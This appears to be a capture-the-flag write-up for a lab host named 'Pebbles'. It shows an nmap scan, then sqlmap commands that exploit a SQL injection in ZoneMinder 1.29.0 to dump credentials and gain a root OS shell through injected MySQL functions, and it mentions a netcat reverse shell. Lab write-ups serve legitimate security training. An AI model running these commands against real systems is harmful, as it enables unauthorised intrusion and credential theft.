Pebbles
Intro
Initial Foothold
Full TCP Port Scan
# Nmap 7.94SVN scan initiated Fri Apr 12 09:23:41 2024 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/joe/hax/pg/results/pebbles.pg/scans/_full_tcp_nmap.txt -oX /home/joe/hax/pg/results/pebbles.pg/scans/xml/_full_tcp_nmap.xml pebbles.pg
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -645411 microseconds. Ignoring time.
Nmap scan report for pebbles.pg (192.168.247.52)
Host is up, received user-set (0.040s latency).
Scanned at 2024-04-12 09:23:42 CDT for 113s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTlsFY1sjAxyC1lqlzeHAaSC0ec76cB5Hoq6aVwMNphXzrhslKqJJ5L0sjOjQem02G6wukOQ/qIVzUZOPxdn4tlN+YuCRqrE7nSIj36hh6JeG4cI9t3qOJUPndLKuKSyJKwV1Dl7gQKcjS0gxO6kWybHMf4CT9a8QsF8mLDPNU3p5VfsEdrgJ+q5hNOmLYJPqwIHTdCweuSwaORn9wQGlmKphGZJlktEKEPwecDZO5KUc6g3N23G+vWv2uCmAw9ov8AQrePxdjz5/QQ8PdY6zedwcLUFjmL5jx9UhZLhDDf/pzP0wiswgm7DZXG6WHwMCbxNo0zX4/HFDswDHc/W+J
| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOrgGvGclvZKKtoTk+H0ojQxTTSKljSVFLY8udD6Cb8OQLjgd5F48Em8sa7JjoCa4Mn3USw7EttQLL9a1RNEgio=
| 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBSm8eCxMlgt56SQ1z3TjY8R0ZY2MMMlYTB4Bby39xXE
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3305/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-favicon: Apache Tomcat
|_http-title: Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.11 - 4.1 (88%), Linux 4.4 (88%), Linux 3.2.0 (85%), Linux 3.16 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/12%OT=21%CT=%CU=%PV=Y%DS=4%DC=T%G=N%TM=6619445F%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10C%TI=Z%TS=8)
OPS(O1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%O6=M551ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M551NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.005 days (since Fri Apr 12 09:19:05 2024)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 39.62 ms 192.168.45.1
2 39.54 ms 192.168.45.254
3 39.88 ms 192.168.251.1
4 39.80 ms pebbles.pg (192.168.247.52)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 12 09:25:35 2024 -- 1 IP address (1 host up) scanned in 114.29 seconds
Open Ports
21/tcp - vsftpd 3.0.3
22/tcp - OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp - Apache httpd 2.4.18 ((Ubuntu))
3305/tcp - Apache httpd 2.4.18 ((Ubuntu))
8080/tcp - Apache httpd 2.4.18 ((Ubuntu))
Testing 21/tcp
No anonymous logon available
Credentials admin/admin did not result in access
Testing 22/tcp
No brute forcing performed yet
Testing 80/tcp
Login form was available on landing page
Login form not vulnerable to SQLi up to Level/Risk 2 via sqlmap
Found interesting directory - zm (ZoneMinder application)
Testing 8080/tcp
No login page observed
Found interesting directory - zm (ZoneMinder application)
Testing 3305/tcp
No login page observed
Found interesting directory - zm (ZoneMinder application)
Performed SQLi on ZoneMinder 1.29.0
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' -D 'zm' -T 'Users' -C Userna
me,Password --dump
...
[10:12:07] [INFO] cracked password 'admin' for user 'admin'
Database: zm
Table: Users
[1 entry]
+----------+---------------------------------------------------+
| Username | Password |
+----------+---------------------------------------------------+
| admin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 (admin) |
+----------+---------------------------------------------------+
Attempting --os-shell option in sqlmap
sqlmap -u 'http://pebbles.pg:3305/zm/index.php' --data 'view=request&request=log&task=query&limit=100' -p 'limit' --os-shell
___
__H__
___ ___["]_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey a
ll applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this progra
m
[*] starting @ 11:05:08 /2024-04-12/
[11:05:08] [INFO] resuming back-end DBMS 'mysql'
[11:05:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ZMSESSID=muf90i9ed6t...1llf5i72a1;zmSkin=classic;zmCSS=classic'). Do you want
to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: limit (POST)
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#
---
[11:05:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:05:10] [INFO] fingerprinting the back-end DBMS operating system
[11:05:10] [INFO] the back-end DBMS operating system is Linux
[11:05:10] [INFO] testing if current user is DBA
[11:05:10] [INFO] fetching current user
[11:05:10] [INFO] resumed: root@localhost
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[11:05:15] [INFO] checking if UDF 'sys_exec' already exist
[11:05:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N] y
[11:05:29] [INFO] checking if UDF 'sys_eval' already exist
[11:05:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:05:29] [INFO] detecting back-end DBMS version from its banner
[11:05:29] [INFO] resumed: 5.7.30-0ubuntu0.16.04.1
[11:05:29] [INFO] retrieving MySQL plugin directory absolute path
[11:05:29] [INFO] resumed: /usr/lib/mysql/plugin/
[11:05:32] [INFO] retrieved:
[11:05:42] [INFO] adjusting time delay to 1 second due to good response times
8040
[11:05:50] [INFO] the local file '/tmp/sqlmapsu8jrs7w61063/lib_mysqludf_sysjm3mu5i0.so' and the remote file '/usr/lib/mysql/plugin/libsbtnb.so' have the same size (8040 B)
[11:05:50] [INFO] creating UDF 'sys_exec' from the binary UDF file
[11:05:50] [INFO] creating UDF 'sys_eval' from the binary UDF file
[11:05:50] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[11:05:50] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:03] [INFO] retrieved: root
command standard output: 'root'
os-shell> cat /root/proof.txt
do you want to retrieve the command standard output? [Y/n/a] Y
[11:06:33] [INFO] retrieved: 7574772785970f747047e659aa85b43a
command standard output: '7574772785970f747047e659aa85b43a'
Catching reverse shell, run nc mkfifo revshell command via sqlmap's --os-shell
Privilege Escalation
No privilege escalation required
Last updated